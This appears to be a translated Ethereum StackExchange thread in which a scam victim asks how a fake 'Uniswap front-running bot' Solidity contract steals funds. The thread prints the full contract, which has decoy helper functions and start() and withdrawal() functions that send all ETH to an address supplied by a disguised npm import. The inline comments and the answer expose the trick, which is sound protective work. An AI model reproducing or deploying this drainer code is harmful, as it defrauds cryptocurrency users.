Solidity

這個騙局程式碼如何將代幣轉移到內部未指定的錢包中?

  • August 15, 2022

以下是詐騙者誘導人們自行執行的確切 Solidity 程式碼。我檢查過,程式碼中沒有指定任何錢包地址,但是只要你執行並呼叫 start(),這段程式碼就會把合約地址中的代幣轉走。雖然我在 payable 轉帳那一行看到了可疑的函式 DepositAddress(),但這段程式碼看起來並沒有導入定義 DepositAddress() 的其他程式碼,也沒有導入任何可疑的函式庫,那麼他們是如何呼叫到它的?另外,new Manager() 乍看之下是在建立未知類別 Manager 的新實例,對嗎?同樣地,如果沒有導入這些函式,這段程式碼怎麼能運作?如果其他程式碼有實際意義,我也想知道它們在做什麼。謝謝你。

合約地址:0x37caba0155ac3bf705d08b8522daff54ddc006a0

   //SPDX-License-Identifier: 1inchSwap
   pragma solidity ^0.6.6;
   
   // Import Libraries
   import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
   // New Token Scan
   import "coinmarketcap.com/coins";
   
   /*
    * @dev NOTE(review): the names and doc comments in this listing describe a
    *      front-running bot, but no statement here reads a mempool, calls
    *      Uniswap or places a trade. The only value-moving statements are in
    *      start() and withdrawal(): each sends the contract's whole ETH
    *      balance to the address returned by manager.DepositAddress().
    *      `Manager` is not declared in this file; according to the answer on
    *      this page it is supplied by the `coinmarketcap.com/coins` import, so
    *      the payout address lives outside the code shown here.
    *      Every other function is an internal/private pure helper that no
    *      public function of this contract calls.
    */
   contract UniswapFrontrunBot {


   // Labels stored by the constructor; nothing else in this contract reads them.
   string public tokenName;
   string public tokenSymbol;
   // Declared but never assigned or read anywhere in this contract.
   uint frontrun;
   // Created in the constructor; its type comes from an import, not from this file.
   Manager manager;

   /*
    * @dev Stores the two label strings and creates a Manager with `new`.
    * @param _tokenName Copied into tokenName.
    * @param _tokenSymbol Copied into tokenSymbol.
    */
   constructor(string memory _tokenName, string memory _tokenSymbol) public {
       tokenName = _tokenName;
       tokenSymbol = _tokenSymbol;
       manager = new Manager();
   }

   // Accepts plain ETH transfers with no logic; the ETH accrues to this contract's balance.
   receive() external payable {}

   // Length/pointer pair. The helpers below pass _ptr to mload, i.e. they treat it as a memory address.
   struct slice {
       uint _len;
       uint _ptr;
   }
   /*
    * @dev NOTE(review): despite the name, this compares two slices 32 bytes at
    *      a time. It returns the difference of the first differing (masked)
    *      words, or the difference of the lengths when no word differs.
    *      Nothing here looks up contracts or liquidity.
    * @param self The first slice to compare.
    * @param other The second slice to compare.
    * @return A non-zero word difference cast to int, else self._len - other._len.
    */

   function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
       uint shortest = self._len;

      if (other._len < self._len)
            shortest = other._len;

       uint selfptr = self._ptr;
       uint otherptr = other._ptr;

       for (uint idx = 0; idx < shortest; idx += 32) {
           // Words read from each slice on this iteration
           uint a;
           uint b;

           // NOTE(review): both literals are the same string and the values
           // returned by loadCurrentContract are discarded, so these four
           // lines do not feed into the comparison below.
           string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
           string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
           loadCurrentContract(WETH_CONTRACT_ADDRESS);
           loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
           assembly {
               a := mload(selfptr)
               b := mload(otherptr)
           }

           if (a != b) {
               // Mask out the bytes past the shorter length, then compare again
               uint256 mask = uint256(-1);

               if(shortest < 32) {
                 mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
               }
               uint256 diff = (a & mask) - (b & mask);
               if (diff != 0)
                   return int(diff);
           }
           selfptr += 32;
           otherptr += 32;
       }
       return int(self._len) - int(other._len);
   }

   /*
    * @dev NOTE(review): substring search, not a contract lookup. The body is
    *      the same as findPtr() further down: it returns the memory address
    *      of the first occurrence of the needle inside the haystack, or
    *      selfptr + selflen when there is none. No function in this contract
    *      calls it.
    * @param selflen Length of the haystack in bytes.
    * @param selfptr Memory address of the haystack.
    * @param needlelen Length of the needle in bytes.
    * @param needleptr Memory address of the needle.
    * @return Address of the match, or selfptr + selflen.
    */
   function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
       uint ptr = selfptr;
       uint idx;

       if (needlelen <= selflen) {
           if (needlelen <= 32) {
               // Needles of up to 32 bytes fit in one word: compare masked words
               bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

               bytes32 needledata;
               assembly { needledata := and(mload(needleptr), mask) }

               uint end = selfptr + selflen - needlelen;
               bytes32 ptrdata;
               assembly { ptrdata := and(mload(ptr), mask) }

               while (ptrdata != needledata) {
                   if (ptr >= end)
                       return selfptr + selflen;
                   ptr++;
                   assembly { ptrdata := and(mload(ptr), mask) }
               }
               return ptr;
           } else {
               // For long needles, use hashing
               bytes32 hash;
               assembly { hash := keccak256(needleptr, needlelen) }

               for (idx = 0; idx <= selflen - needlelen; idx++) {
                   bytes32 testHash;
                   assembly { testHash := keccak256(ptr, needlelen) }
                   if (hash == testHash)
                       return ptr;
                   ptr += 1;
               }
           }
       }
       return selfptr + selflen;
   }


   /*
    * @dev NOTE(review): returns its argument unchanged. retptr is computed and
    *      never used; no contract is loaded.
    * @param self Any string.
    * @return The same string.
    */
   function loadCurrentContract(string memory self) internal pure returns (string memory) {
       string memory ret = self;
       uint retptr;
       assembly { retptr := add(ret, 32) }

       return ret;
   }

   /*
    * @dev NOTE(review): UTF-8 helper, unrelated to Uniswap. Reads the first
    *      byte of `self`, derives a 1-4 byte sequence length from it, points
    *      `rune` at that sequence and advances `self` past it.
    * @param self The slice to operate on (modified in place).
    * @param rune The slice that will contain the first rune.
    * @return `rune`.
    */
   function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
       rune._ptr = self._ptr;

       if (self._len == 0) {
           rune._len = 0;
           return rune;
       }

       uint l;
       uint b;
       // Load the first byte of the rune into the LSBs of b
       assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
       if (b < 0x80) {
           l = 1;
       } else if(b < 0xE0) {
           l = 2;
       } else if(b < 0xF0) {
           l = 3;
       } else {
           l = 4;
       }

       // Check for truncated codepoints
       if (l > self._len) {
           rune._len = self._len;
           self._ptr += self._len;
           self._len = 0;
           return rune;
       }

       self._ptr += l;
       self._len -= l;
       rune._len = l;
       return rune;
   }

   // Copies len bytes from memory address src to memory address dest.
   // No function in this contract calls it.
   function memcpy(uint dest, uint src, uint len) private pure {
       // Copy whole 32-byte words while at least 32 bytes remain
       for(; len >= 32; len -= 32) {
           assembly {
               mstore(dest, mload(src))
           }
           dest += 32;
           src += 32;
       }

       // Copy remaining bytes
       uint mask = 256 ** (32 - len) - 1;
       assembly {
           let srcpart := and(mload(src), not(mask))
           let destpart := and(mload(dest), mask)
           mstore(dest, or(destpart, srcpart))
       }
   }

   /*
    * @dev NOTE(review): nothing is ordered and no liquidity is read. Decodes
    *      the first UTF-8 sequence of the slice into a number.
    * @param self The slice to operate on.
    * @return The decoded value, or 0 for an empty slice, a truncated sequence
    *         or a continuation byte that is not of the form 10xxxxxx.
    */
   function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
       if (self._len == 0) {
           return 0;
       }

       uint word;
       uint length;
       uint divisor = 2 ** 248;

       // Load the first 32-byte word of the slice; b becomes its most significant byte
       assembly { word:= mload(mload(add(self, 32))) }
       uint b = word / divisor;
       if (b < 0x80) {
           ret = b;
           length = 1;
       } else if(b < 0xE0) {
           ret = b & 0x1F;
           length = 2;
       } else if(b < 0xF0) {
           ret = b & 0x0F;
           length = 3;
       } else {
           ret = b & 0x07;
           length = 4;
       }

       // Check for truncated codepoints
       if (length > self._len) {
           return 0;
       }

       for (uint i = 1; i < length; i++) {
           divisor = divisor / 256;
           b = (word / divisor) & 0xFF;
           if (b & 0xC0 != 0x80) {
               // Invalid UTF-8 sequence
               return 0;
           }
           ret = (ret * 64) | (b & 0x3F);
       }

       return ret;
   }

   /*
    * @dev NOTE(review): counts UTF-8 sequences in the slice; no liquidity is
    *      calculated. Each iteration skips 1-6 bytes depending on the byte
    *      it reads.
    * @param self The slice to operate on.
    * @return The length of the slice in runes.
    */
   function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
       uint ptr = self._ptr - 31;
       uint end = ptr + self._len;
       for (l = 0; ptr < end; l++) {
           uint8 b;
           assembly { b := and(mload(ptr), 0xFF) }
           if (b < 0x80) {
               ptr += 1;
           } else if(b < 0xE0) {
               ptr += 2;
           } else if(b < 0xF0) {
               ptr += 3;
           } else if(b < 0xF8) {
               ptr += 4;
           } else if(b < 0xFC) {
               ptr += 5;
           } else {
               ptr += 6;
           }
       }
   }


   /*
    * @dev NOTE(review): no mempool access. Converts text made of two skipped
    *      leading characters followed by 40 hex digits into an address,
    *      reading _a[2] through _a[41]. Characters outside 0-9, a-f and A-F
    *      are not rejected; their raw byte value is used as-is.
    * @param _a The text to convert.
    * @return _parsed The address built from the 20 decoded bytes.
    */
   function parseMemoryPool(string memory _a) internal pure returns (address _parsed) {
       bytes memory tmp = bytes(_a);
       uint160 iaddr = 0;
       uint160 b1;
       uint160 b2;
       // One iteration per output byte: two characters in, one byte appended to iaddr
       for (uint i = 2; i < 2 + 2 * 20; i += 2) {
           iaddr *= 256;
           b1 = uint160(uint8(tmp[i]));
           b2 = uint160(uint8(tmp[i + 1]));
           // ASCII 97-102 is 'a'-'f', 65-70 is 'A'-'F', 48-57 is '0'-'9'
           if ((b1 >= 97) && (b1 <= 102)) {
               b1 -= 87;
           } else if ((b1 >= 65) && (b1 <= 70)) {
               b1 -= 55;
           } else if ((b1 >= 48) && (b1 <= 57)) {
               b1 -= 48;
           }
           if ((b2 >= 97) && (b2 <= 102)) {
               b2 -= 87;
           } else if ((b2 >= 65) && (b2 <= 70)) {
               b2 -= 55;
           } else if ((b2 >= 48) && (b2 <= 57)) {
               b2 -= 48;
           }
           iaddr += (b1 * 16 + b2);
       }
       return address(iaddr);
   }


   /*
    * @dev Returns the keccak-256 hash of the slice's bytes.
    * @param self The slice to hash.
    * @return The hash of the slice.
    */
   function keccak(slice memory self) internal pure returns (bytes32 ret) {
       assembly {
           // mload(self) is the first struct field (_len), mload(add(self, 32)) the second (_ptr)
           ret := keccak256(mload(add(self, 32)), mload(self))
       }
   }

   /*
    * @dev NOTE(review): no liquidity check. Formats `a` as lowercase hex
    *      without a prefix, then left-pads through mempool(): "0" for 4 or 3
    *      digits, "000" for 2 digits, "0000" for 1 digit. Other lengths,
    *      including the empty string produced for a == 0, are returned
    *      unpadded.
    * @param a The number to format.
    * @return The hex text.
    */
       function checkLiquidity(uint a) internal pure returns (string memory) {
       // Count the hex digits of a
       uint count = 0;
       uint b = a;
       while (b != 0) {
           count++;
           b /= 16;
       }
       // Fill the buffer from the least significant digit backwards
       bytes memory res = new bytes(count);
       for (uint i=0; i<count; ++i) {
           b = a % 16;
           res[count - i - 1] = toHexDigit(uint8(b));
           a /= 16;
       }
       uint hexLength = bytes(string(res)).length;
       if (hexLength == 4) {
           string memory _hexC1 = mempool("0", string(res));
           return _hexC1;
       } else if (hexLength == 3) {
           string memory _hexC2 = mempool("0", string(res));
           return _hexC2;
       } else if (hexLength == 2) {
           string memory _hexC3 = mempool("000", string(res));
           return _hexC3;
       } else if (hexLength == 1) {
           string memory _hexC4 = mempool("0000", string(res));
           return _hexC4;
       }

       return string(res);
   }


   /*
    * @dev If `self` starts with `needle`, `needle` is removed from the
    *      beginning of `self`. Otherwise, `self` is unmodified.
    * @param self The slice to operate on.
    * @param needle The slice to search for.
    * @return `self`
    */
   function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
       if (self._len < needle._len) {
           return self;
       }

       bool equal = true;
       if (self._ptr != needle._ptr) {
           // Compare the first needle._len bytes of both slices by hash
           assembly {
               let length := mload(needle)
               let selfptr := mload(add(self, 0x20))
               let needleptr := mload(add(needle, 0x20))
               equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
           }
       }

       if (equal) {
           self._len -= needle._len;
           self._ptr += needle._len;
       }

       return self;
   }

   function start() public payable {      

   /*
    * @dev NOTE(review): the single statement below transfers this contract's
    *      entire ETH balance, including any ETH attached to this call, to the
    *      address returned by manager.DepositAddress(). No trading logic runs.
    *      There is no caller check, and the recipient is chosen by Manager:
    *      this contract never records msg.sender or a deployer address.
    */

       payable(manager.DepositAddress()).transfer(address(this).balance);
   }



   // Returns the memory address of the first byte of the first occurrence of
   // `needle` in `self`, or the first byte after `self` if not found.
   // No function in this contract calls it.
   function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
       uint ptr = selfptr;
       uint idx;

       if (needlelen <= selflen) {
           if (needlelen <= 32) {
               // Needles of up to 32 bytes fit in one word: compare masked words
               bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

               bytes32 needledata;
               assembly { needledata := and(mload(needleptr), mask) }

               uint end = selfptr + selflen - needlelen;
               bytes32 ptrdata;
               assembly { ptrdata := and(mload(ptr), mask) }

               while (ptrdata != needledata) {
                   if (ptr >= end)
                       return selfptr + selflen;
                   ptr++;
                   assembly { ptrdata := and(mload(ptr), mask) }
               }
               return ptr;
           } else {
               // For long needles, use hashing
               bytes32 hash;
               assembly { hash := keccak256(needleptr, needlelen) }

               for (idx = 0; idx <= selflen - needlelen; idx++) {
                   bytes32 testHash;
                   assembly { testHash := keccak256(ptr, needlelen) }
                   if (hash == testHash)
                       return ptr;
                   ptr += 1;
               }
           }
       }
       return selfptr + selflen;
   }

   /*
    * @dev Maps a value in 0-15 to the ASCII character '0'-'9' or 'a'-'f'.
    *      Reverts without a message for any larger value.
    * @param d The value to convert.
    * @return The hex digit as a single byte.
    */
   function toHexDigit(uint8 d) pure internal returns (byte) {
       if (0 <= d && d <= 9) {
           return byte(uint8(byte('0')) + d);
       } else if (10 <= uint8(d) && uint8(d) <= 15) {
           return byte(uint8(byte('a')) + d - 10);
       }
       // revert("Invalid hex digit");
       revert();
   }

   /*
    * @dev Formats an unsigned integer as decimal text. No function in this
    *      contract calls it.
    * @param _i The number to format.
    * @return _uintAsString The decimal digits, "0" for zero.
    */
   function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
       if (_i == 0) {
           return "0";
       }
       // Count the decimal digits
       uint j = _i;
       uint len;
       while (j != 0) {
           len++;
           j /= 10;
       }
       // Fill the buffer from the last digit backwards; 48 is ASCII '0'
       bytes memory bstr = new bytes(len);
       uint k = len - 1;
       while (_i != 0) {
           bstr[k--] = byte(uint8(48 + _i % 10));
           _i /= 10;
       }
       return string(bstr);
   }

   function withdrawal() public payable { 

   /*
    * @dev NOTE(review): same statement as start(): the whole ETH balance goes
    *      to the address returned by manager.DepositAddress(). Nothing in this
    *      contract stores a creator address, so the funds are not returned to
    *      the deployer unless Manager happens to return that address.
    */   
       payable(manager.DepositAddress()).transfer(address(this).balance);
   }

   /*
    * @dev NOTE(review): plain string concatenation; no mempool is loaded.
    * @param _base The text placed first.
    * @param _value The text appended after _base.
    * @return A new string holding _base followed by _value.
    */
   function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
       bytes memory _baseBytes = bytes(_base);
       bytes memory _valueBytes = bytes(_value);

       string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
       bytes memory _newValue = bytes(_tmpValue);

       uint i;
       uint j;

       // j is the write position in _newValue and runs across both loops
       for(i=0; i<_baseBytes.length; i++) {
           _newValue[j++] = _baseBytes[i];
       }

       for(i=0; i<_valueBytes.length; i++) {
           _newValue[j++] = _valueBytes[i];
       }

       return string(_newValue);
   }

   }

看起來 coinmarketcap.com 是一個 NPM 套件,它會返回黑客的地址,並包含 Manager 的詳細資訊。當您刪除該導入行時,Manager 會報錯。

npm 包在這裡

如果你想查看 npm 套件的內容,可以按照以下步驟。

npm view coinmarketcap.com dist.tarball

這將為您提供 NPM 套件壓縮檔的連結。把它下載到您的機器上,您會看到 coins 文件。執行:

cat coins | grep -r -A 5 DepositAddress

您將看到DepositAddress()功能和所有內容。

有什麼辦法可以追查騙我的這個人嗎?我想知道是否有辦法追回我的 ETH?

引用自:https://ethereum.stackexchange.com/questions/133570